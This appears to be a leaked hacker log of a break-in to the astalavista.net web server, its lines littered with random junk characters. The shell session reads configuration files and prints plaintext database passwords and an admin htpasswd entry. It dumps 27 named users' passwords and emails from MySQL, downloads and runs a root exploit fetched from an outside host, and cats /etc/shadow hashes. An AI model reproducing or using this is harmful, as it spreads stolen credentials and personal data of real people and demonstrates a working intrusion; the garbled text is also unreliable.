( C# C8 O& s' i8 t Ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .+ p! }+ V2 z6 A
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
7 a7 q t; P; N3 {. Q- _6 zdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007! Y4 A9 H2 g5 r0 \- Z1 H6 g
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql) i' b6 S4 K1 v5 V B
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com! r# C0 x# T2 _# b1 K& F8 k
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend3 E0 \; H) G4 B% Y7 f' ]
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
6 y7 W: X1 Y- y' y& h-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
! k. N h! ^1 v3 Z- _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
( I w8 G0 W3 `' {( f: hdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
& `8 b, L# g% E7 }1 Bdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
+ `& L, J# L5 J' P$ ^-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
: Z0 Q& Z8 e# L- X0 ]7 M-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico" V- a1 o& }$ o% f4 i# u
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
9 _) A5 n9 s. m3 m' odrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
; P/ \ D/ x$ z( W& P-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess! Q: N: c) [6 L0 [4 r
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess {1 |# W) ?% S, M
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php! b! i* D! c, a/ H- V+ |, K7 u
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
4 M+ H6 t/ L2 _7 p-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
, G9 T2 M+ m2 L0 C: D& V-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
1 s* G6 d- y2 A2 l" Y-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf% ^, P- V% `7 J& }/ K* Q# @: p$ c
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc0 S: p" s- o6 ~2 V$ E: p
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
) C3 k. _( o% Z" i8 a' H5 Cdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
# z: K! l% ^& n6 I4 xdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log- W. u# e3 \. }$ A
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
/ T0 c" ~1 q! F3 zdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata/ S& x$ C$ d5 j s% `
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new6 v) g6 P- L) |+ J/ |, ~$ f h: o
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
- N S& y w# e/ ~1 a& X+ Adrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re' |4 @0 o' g; f) L' h0 n( Q
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
- i+ p5 y) [1 c9 \' C) ]# ~# Ldrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
* P! X- t; w& E( }drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources/ i% p' X) V7 @# _
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com* J0 [" M/ a8 H# P9 i, j
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
' X) ~" K2 F- B- _drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src! F5 @$ Z7 g$ X9 z" @/ x1 f' {
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl2 v! _7 H: F3 V9 g6 q
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2 W, j7 a2 q! h
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old4 A$ W) B0 c% R0 O
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php6 G& G r) M+ b5 c
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki: }- v6 j0 P" C% A
2 N+ Y% V, j+ ~4 \' lsh-3.2$ head -20 index.php
/ e# J9 C1 Y. e+ b$ E<?PHP
# |& J. i6 E4 E% ~7 G/**: K! b) N( y, l1 ?) [ F) k
* Mainfile (external) for astalavistaNET v2.07 O; v" H' e! e0 J
*
5 s( k. d/ s( s* @copyright Astalavista IT Engineering GmbH/ T6 m" L' X. Z0 I1 h
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>" b. \! V- I! H2 J, x m
* @version 1.0
0 I8 X2 n! A9 A, O" R# v*/1 ]# M3 U$ n8 ~8 G; a
, i" T) p+ ~" y0 ^ _( |: j, ?$ r, G
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {! d+ X7 \+ a4 E. O/ P% D
$dontStartSession = false;
* n) ?. ~( Y! ]" y2 z& h } else {
: q9 ^; |# v/ H# U+ |% V$ _6 V $dontStartSession = true;6 I) K1 S4 E# n
}
, _: f' y& \# p5 Z0 P0 C3 V, P require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);( |/ ~! M ]& C6 C- U8 p& }
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);0 H/ l( _) V* ^( v$ b" D5 U# v
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
& _4 U' `! u8 T# k$ v# p6 k require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);' g7 ^6 D( b6 |# F6 }4 A
1 V: K8 C9 u" K; I# e5 ^( @
sh-3.2$ cd config
8 R/ I, ?& C, Q7 w9 h) ~3 ush-3.2$ ls -la, w8 j( Y2 i/ |' _( ]
total 328 F6 D% n! G/ P" c4 U) E
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
+ D( l' Y( [; D6 f+ X8 B: t; Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 `7 `: G& ~/ ~- z. u
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php/ x& ]1 Y* d% ~ F& r$ X
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
' A; ?9 y1 L! U0 N S-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php: `& [ x8 e) c% k n
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
" p6 w9 h" O- q S4 \8 _-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
& S6 h0 H/ @) |% J4 h" H3 @4 o5 T- ~ k- R& l
sh-3.2$ cat com.conf.php
8 ^: A% f/ O; i2 Q0 C1 n8 Y) q[snip]
, D+ q4 M7 |3 s: f//member-database
% a, W" k) f) ]$ m$_CONFIG['db_mem_server'] = ‘localhost’;; b1 U/ P+ S; c
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
\9 e3 K- N, _( Q3 k$_CONFIG['db_mem_user'] = ‘astanet_db’;
9 l# b3 q+ Z' }3 m% b; J$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
' \7 _& y6 B9 T4 r$_CONFIG['db_mem_debug'] = false; //true or false/ k, F0 @4 g# y& a
//ads-database
6 L5 M7 H# E* ]5 l! |) q6 x2 U( g% |$_CONFIG['db_ads_server'] = ‘localhost’;
5 w/ x- ~- c& d' k3 s2 B$_CONFIG['db_ads_database'] = ‘astanet_ads’;# p. u' H( g" D; {
$_CONFIG['db_ads_user'] = ‘astanet_db’;
. f3 L; D' ^* T4 @7 U$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
) R! _! o" J: k+ a0 t$_CONFIG['db_ads_debug'] = false; //true or false- L+ h9 Y) l$ O( @' T
//rainbow-database5 I# F9 ?7 _9 R
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
: P" p6 ~6 n2 @; {, O9 l& V4 d. C O$_CONFIG['db_rainbow_database'] = ‘rainbow’;$ e4 d/ x7 ?- @, G
$_CONFIG['db_rainbow_user'] = ‘dinu’;
, T# R0 x9 H$ j+ g( m$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
; p) x: W5 Y) y8 F/ e5 H5 D% [$_CONFIG['db_rainbow_debug'] = false; //true or false. _% I3 I |0 \' p
//mailing lists database, o7 _) r$ m/ b
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;9 b* h" w& s8 {5 c6 a$ G
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
$ T- @; ]' t, F# o$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
% r# K3 v9 H! R* t7 Y$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
# m, D/ U0 k9 |3 O+ P! L. p. a$_CONFIG['db_mailing_lists_debug'] = false; //true or false
9 g) c: E" C/ d" s( U//paypal. T5 G" a2 O+ l
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
9 Z; \& s( H, n! q; X$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
. m1 H5 l% Y- J( [# ]/ t$ X4 {$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;+ G2 P- B5 x2 ~" q
$_CONFIG['sub_pp_noship'] = ‘1′;
( B/ d6 y$ R3 z+ \. ]8 B0 j$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;: }' B* o5 H6 o( s+ h9 m
[snip]
) `+ U# B* n! i7 |; B. x
( |# L+ o* Z; b2 y2 a4 Zsh-3.2$ cd ..$ a7 L0 Q0 s9 a# l
sh-3.2$ cd member
! [* d- Q7 e! \+ u: n; \7 Bsh-3.2$ ls -la
: B& G- u' z. j- y( n( ~* Jtotal 20
8 C9 Y9 D: c5 y* c; C+ cdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
- a5 P; `; f; f% I! ]7 I9 F9 cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 F1 ^# M. P0 [0 w-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
; I0 E+ x$ t4 K o-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php0 U" M N# Y, j" t5 l3 `4 b. `
sh-3.2$ cat .htaccess
$ ~4 _2 `8 R6 n& ^8 s; TSecFilterEngine off' W+ L0 \% e, h: k5 X1 k0 j6 D! Y4 o' x
J) z% c2 ~& h" ~4 s6 ~) {sh-3.2$ cd ..* I _+ c9 x5 W
sh-3.2$ cd cron
" W& a0 Y' k# G: r/ Gsh-3.2$ ls -la
( l7 y$ B7 g+ k, X% qtotal 168
: I \, a1 S& z. F1 jdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
( Y6 Q/ X% H. M' p9 Vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..* d. |) w5 ~! P
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
& J w& w L) G" p-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
, l$ n; V' T% }, g& r; q( v. l( c-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
5 d R/ q& y; M" R; E. U) J$ D6 o-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php) c& L; Y/ B. S0 Q: ~6 \
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php" [* h3 k* o- r/ ]! W# ?! s
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
. `, F$ y1 x- ^: @+ \) `-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php9 C7 f; p3 t* N6 f. {8 a7 H
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
' l2 H ?, U ]- C! U-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
& H7 J$ S, i' M6 e) R5 Q0 G-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php/ x0 x8 e* y( K/ f8 g
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php* y' t" P- ]; f/ V7 X
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
, f, e- ^9 Y; J7 X6 L-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
8 g& G7 L: M8 ]5 A4 n-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php0 W$ o. C0 n3 d4 F5 j; u# n% L
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php8 B+ o! u p; o7 o+ F% z9 ?
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
' `7 l: d& T. U9 S7 C-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
0 u0 Q. C* }" V) T7 s-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php& F% J0 C2 V# o/ o
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email# _/ F/ n( l4 j4 Y
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php" d. s5 h0 S! e; e3 p K9 Z& y
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
% J6 @$ O6 i& s# |4 P0 J8 A. @+ S7 O* t* w% _* d
sh-3.2$ cd ..$ Q4 L9 d) o r! Z5 L7 C
sh-3.2$ cd _007/ Q) Q$ @, W; d! C$ ^3 d w! O
sh-3.2$ ls -la8 h \; N1 R m
total 244 ?1 Q6 n% W( K z/ A5 s
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .6 B/ X6 O8 z' Y
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 R/ R4 ?" y3 b) }2 M-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
% b( J0 V- V/ @7 w& m" r$ _-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
3 }9 f# S# V4 B8 a* K. g) @" m4 x-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
8 ~$ k! V% h* c" x, gdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap- e0 _2 p1 @. G6 s: s
4 f& V4 f+ r+ Y0 |8 [5 H8 ~sh-3.2$ cat .htaccess
$ n g9 H5 i! Z) G; w, PauthType Basic
$ Y4 _! t8 c9 X! @; x/ l2 N* mauthName Admin, b0 B' }3 D( h
authUserFile /home/astanet/auth/.htadm_pwd
9 ?6 R7 ?2 |9 t( f3 O" yrequire valid-user
; I: i2 O7 e* A2 M1 Z" y f! ?* w7 F( m: \% {$ f% `
sh-3.2$ cat /home/astanet/auth/.htadm_pwd9 I+ E3 f2 w8 m4 O5 m% q: H8 @( ]
admin2net:CR0bl65MwhfT+ I7 L$ {5 j3 u* R" s4 m8 c( l
/ H* ^, w9 w7 F* L+ h( i2 _
sh-3.2$ mysql -u astanet_db -p5 m3 F4 R( v; q% q x
Enter password:4 l* T& n$ S+ q+ z4 M0 e
Welcome to the MySQL monitor. Commands end with ; or \g.& {4 i& K* `/ }* ]1 R' m; j
Your MySQL connection id is 2751535 a* n, Y* k7 X+ M
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* ]7 p+ l: @3 V2 G9 G3 m; [; Y! y9 k5 n! [( u. r
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer." {$ m+ A! {9 [
& H# l9 l: q+ X' u
mysql> show databases;
$ t' _' F; @% k' e0 n6 V: d# ^& u+———————–+
. N& G2 M) N, r8 N' h9 o; S" Y+ s| Database |
2 m2 T4 P5 x9 n8 P: S- z2 S- H P. j+———————–+
+ j2 w, n' L* L3 o5 r, W| information_schema |
+ Q8 p8 p3 U0 y3 @) S7 W6 q| astanet_ads |
! |6 H1 ~! E. ]2 L. C$ h. g| astanet_mailing_lists |
- N8 H8 I& _+ I N* N| astanet_mediawiki |
- k, q' p3 \0 c# g| astanet_membersystem |
' H, f# W, V$ y7 A: a| test |
1 q7 u7 X: [3 A+———————–+
2 u9 x9 B7 V0 E; M" e6 rows in set (0.00 sec)) p& f! C- Y6 j% j
- I( o: u. X9 @* P. Rmysql> use astanet_membersystem
! d( A* W# F' p4 l7 F/ C1 wDatabase changed3 X! F* \- u& i; o' j. `
mysql> show tables;6 E. x( w) g$ m5 W5 \6 ^# l
+———————————–+
+ S) f. I( R9 s# }+ s) b| Tables_in_astanet_membersystem |. v- B: J3 b, E( }
+———————————–+7 T5 u' L- O1 q( I( o
| blacklist_categories |$ w3 B* k% f+ g8 L
| blacklist_content |# C' d) }+ [- F- o# Z
| blacklist_levels |7 G9 X5 y3 l% j9 n$ d* M1 b
| blacklist_mcset |
3 q& W1 V' X2 C( G: Z' P0 Z) T; s, }| dir_categories |, m( }/ _, T! ?' j
| dir_comments |
9 C2 b+ M5 q, g" R| dir_links |7 M2 B! C3 B" _% Q
| dir_temp |3 P) @; F& r$ c2 p
| dir_votes |: v4 \( o; G# ]5 g( N N7 P
| documents |
$ f6 c7 x' x) P! G* O| documents_categories |3 P! f" I' S! v6 V% z
| email_content |: n" [# z# a4 x( k/ L
| email_settings |! i3 j: K- R0 Y6 {3 Q8 z
| exploits |
m- |( p! _! i| exploits_categories |
. f6 H5 W0 l; }3 r9 I| exploittree_categories |
' p+ q7 r, B k+ i" p g| exploittree_exploits |
; ^" d( a2 r0 c| home_values |/ I- A' D4 G2 h- A
| iso_countries | g2 _; e! K; I$ v
| links_categories |9 Z; w3 T& D/ a0 a, B
| links_records |
7 ?+ }: ~; o5 E* ~( l| links_unauth |
& f' c" Q J J1 Y| links_votes |
/ J/ B: z- Y& F& l) I$ D7 c }* I| log |
" h3 H" D5 [) N# x| news_categories |4 G: m$ P4 m. `! T% u6 o
| news_comments |9 D( U I2 @4 n
| news_emoticons |
& y$ l6 j$ M# d( q1 B; Q Z; z n| news_latest |# B& J9 s9 M/ \) j2 k
| news_messages |
5 b; [. i! z9 J8 H8 G0 t6 s( e4 u| news_statistics |
6 x3 j. A/ i' x: X| news_votes |
% R* h. r: G+ g3 r1 w1 _' Q| prices_content |, O6 a! o! @: q
| prices_offers |4 I2 k: Y+ Y, g. q9 c
| rss_settings |6 H1 Z# _: L- n' P7 A( T
| sessions |) }, D& Y m+ n
| stats_signups |
; {: h* B) Z* s! H. q| u2u2 |
+ F0 l# N, D8 c| u2u_contact |
# f% ^: r0 F0 q. d| u2u_settings |( g5 Z& s% A) |* |, q' q
| user_keywords_selected_categories |
$ @0 ]; |+ X! y| users |
9 R9 g0 T0 t1 ]1 j( z) v| users_ipn_test |9 q) ]$ ?. m7 L' C" W
| users_keyword_values |
3 n- I3 d9 }8 z3 z3 I" Y| users_profile |# @% S; w$ l: Y9 C. x: A
| users_temp |: I+ M' q9 H0 _/ |/ U' ^% ?9 x2 N+ H
| users_upgrade |: b! t) n% _* U
+———————————–+
8 ~$ ~2 b0 S {7 M2 ~5 o46 rows in set (0.00 sec)5 E9 A' q* [2 [4 D/ ~+ V
6 ^! r4 y* K2 t- _& H% C; v7 m
mysql> describe users;" V- \' h) J$ C: m$ Y
+————————–+————————————–+——+—–+———————+—————-+
' a. i8 h9 ]/ N( C. ~| Field | Type | Null | Key | Default | Extra | ^; R1 O! f4 L( y; M# F, e
+————————–+————————————–+——+—–+———————+—————-+! U7 x4 ?5 T) h# e
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |3 X6 {! G* D% d. ^+ c
| user | varchar(50) | NO | | | |
! b" p+ B% n. z. \& a- j8 B" o% W| nickname | varchar(30) | NO | MUL | anonymous | |
$ d9 o" l0 G8 N6 U" w| password | varchar(30) | NO | | | |
6 u4 w8 l+ c% ^| userlevel | tinyint(3) | YES | MUL | NULL | |0 i$ S2 J- M, o W0 t
| exp | int(8) unsigned | NO | | 0 | |% U& b! G% Q9 b" d9 g& `+ |# L P
| email | varchar(50) | NO | | | |# \( ~2 A* k: v9 n
| ip | varchar(15) | NO | | 0 | |3 f: O2 L! z; ^6 q
| proxy | set(’0′,’1′) | NO | | 0 | |
3 X5 }, q3 ?/ `! Z1 L$ z2 M| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |3 T+ m8 H8 c! X- Z8 G( H! l, X
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |# a1 d4 D) u/ D8 i- h% X
| anz_in | tinyint(1) | NO | | -1 | |
4 |$ R9 w' {% @; k| status | tinyint(1) unsigned | NO | | 0 | |
" I" t8 o0 {3 ]| checked | set(’0′,’1′,’2′) | NO | | 0 | |) _# S0 w! s" T2 V
| freemember | set(’0′,’1′) | NO | | 0 | |
! s: k0 f0 R, ^) w| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
6 b! R% }8 Y8 _3 b! a- [| lang | tinytext | NO | | | |
% g- ?2 s# e: e8 M& }9 e9 N4 S| adid | smallint(6) | NO | | 0 | |# R1 K% T& E$ Q" Y8 Z0 X
| pp_txn_id | varchar(255) | YES | | NULL | |
* C8 K( G; j6 g: W+ f6 ^! n" x| cnb_transaction_id | varchar(255) | YES | | NULL | |8 y+ j/ q$ d# P* G* D
| cnb_order_id | varchar(255) | YES | | NULL | |5 |+ F1 [: _- U1 t7 k
| cnb_user_id | int(11) | YES | | 0 | |( F! g. {$ S+ H
+————————–+————————————–+——+—–+———————+—————-+- `) J" ]! p1 h9 C% N: C
22 rows in set (0.01 sec)
4 l5 G$ q. h# B7 Y3 z w, v% [2 a8 h, [( Y2 Y4 n3 v1 _
mysql> select count(*) as skids from users;
( Z6 j, V! F, Q6 i# H. J( x0 Y+——-+
~4 M+ x% d* \' d& H1 t| skids |
; ?# x. \- s3 \$ ]+——-+4 U4 \) q' y2 }- ~
| 25199 |
- ]& Y$ J1 t& {1 {: b1 P% q+——-+
/ m. b& b* W6 I. H1 row in set (0.00 sec)
' u3 B& O* d8 U7 R2 Q3 p3 E& _9 X4 x6 e* ^
mysql> select user,nickname,password,email from users where userlevel = 1;4 m) }3 y! ?- W* g5 b4 j( y
+————————–+———————-+——————+———————————–+
4 e6 l1 S7 Q4 T6 O7 v' i- Z| user | nickname | password | email |
7 j$ h2 u w4 P+————————–+———————-+——————+———————————–+
3 ?# u" p( P; J% O* V| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
: G& U2 x0 ^7 S4 D% T9 B E| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
( }" K! J7 p$ {! || qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
! H& \* m9 j/ f2 X| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |% j: H$ p& L# m1 e! p9 k C/ e# c% @
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |- E# E: F) E$ q4 z! \) o
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |' f; P. F" S# X* F) }& }
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
, f1 D0 Y# H$ F: {' y| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |2 A* N1 p& U: _/ x8 |
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |! r8 o. g) i* _; `( ~8 S
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |* p. f5 Y+ R8 P V( T& U0 d
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
) ?& m, o: {* b3 _& t" Y2 h| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
, ~8 k# e7 |2 Z5 j| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com | s# m: g3 e# u8 ?, _
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
1 M# d3 ]) M" m# Z9 O( l" [| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |5 Y* U6 v' A5 `8 i
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |, Y5 Y0 d4 z0 D; p, ] A3 m
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |+ J6 x$ ~# y6 R' E1 i c8 P9 q
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |: [ A2 S5 ^+ r- y3 Y
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
+ Q! w# {# T1 u# |& {+ T/ || Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
. d( @2 k6 l; O8 t+ X3 C3 d| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |2 U* B4 K5 c3 R( x. r V/ W
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
" ], R9 {+ T" w4 t( s) J3 r| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |4 M+ w# K- u9 A
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |4 M4 C1 ?* C+ H# V
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |8 j+ y3 [- y9 d
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
5 f3 c, S7 q" ?: a6 U| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
& ~, P, B" k0 N" \+————————–+———————-+——————+———————————–+
$ Z! H( K6 g9 J2 ?* e27 rows in set (0.00 sec)$ s7 _+ ?4 i2 {& P: R9 V% C$ [
8 r: h7 Y5 n0 L) D# I. h
mysql> exit;
( s8 X& d" ?' Y' i% |- M I; WBye" [4 j I# F! B L& n
1 {* X& z9 r9 x$ d9 m7 Y9 ?[~] plaintext passwords? yes,3 }5 d8 i( H. n2 }9 i7 _
Those so called “security professionals” who charge you $6.66 / month to
) }1 W2 x8 c* ]$ w7 f$ X1 Zregister at their hack-proof portal, save your passwords in plaintext…/ }. F* F& G$ [
brilliant!: M# d5 _8 u( x$ d$ ?
+ D% d6 |' z& p8 I8 P
[~] This been fun but we want more.
0 ^' f8 ]. {' J3 s% a: w; t
( |/ h' q1 |+ i4 I1 j8 m# T% i7 Csh-3.2$ uname -a
( l& y1 Q1 P, w4 bLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
' T! s; z" E% s( Hsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]% V2 D8 s% W( {3 S9 W( t" V
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
+ u0 a) ?6 Z) h1 n3 z: s* c; @- w! R, n5 ZResolving anti.sec.labs… 13.33.33.378 X: j: e+ M: z' D
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
" q) O( S- t6 ]HTTP request sent, awaiting response… 200 OK
4 R3 W% j' s( R' V3 Z( P$ T8 tLength: 18200 (18K) [text/plain]
* M" F! Z7 }2 Y# t. K: K' NSaving to: `g0troot’
4 @/ o" ^9 c i6 A/ a
+ d0 @5 \8 P3 k2 [5 P100%[=========================================================================================================================================>] 18,200 58.6K/s in
. p5 b( X2 r3 a0.3s
- B/ S" Q: ^7 v$ n! Z
% g5 @' k H/ s9 _1 d8 P18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
2 n9 G+ k1 W1 m7 a1 }7 H$ r. w. u- X/ A
# E3 l" j0 f* Z2 t, J3 Fsh-3.2$ ./g0troot -i x86_64
! g7 j4 [4 x6 Y/ N* h: G) Z+ l[+] g0troot - anti.sec.labs: @; ^ e u3 A: L) Q
[+] Target: 2.6.18-128.1.10.el5* B$ J G% N; j2 w. M9 J8 s7 O: U
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]: P# x: b9 c0 T( E+ F2 q+ n
1 X; J) r$ ~2 V[+] r00tr00t! a8 d/ [' G! C( w
[~] Executing shell…( i% @ c; ~- J# l' v0 j1 C
5 A/ v6 ^" R3 i' Y' ], Z
sh-3.2# id. Q* e' J$ @* F$ K& u% e' h
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)8 _+ z; D" K9 w4 p* h. y2 w, n
- k9 b7 j- ^3 O- c7 A; [
sh-3.2# cat /etc/shadow
& i- L: a. i8 A+ \( ]3 {+ sroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::( d6 u% F" @, A$ y" O1 e* l2 p1 ?
[snip]
& i8 k2 V& u7 Z' m1 Fadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::1 B; \; K& x8 `" Q4 J
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::& D+ j& z- h/ {
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
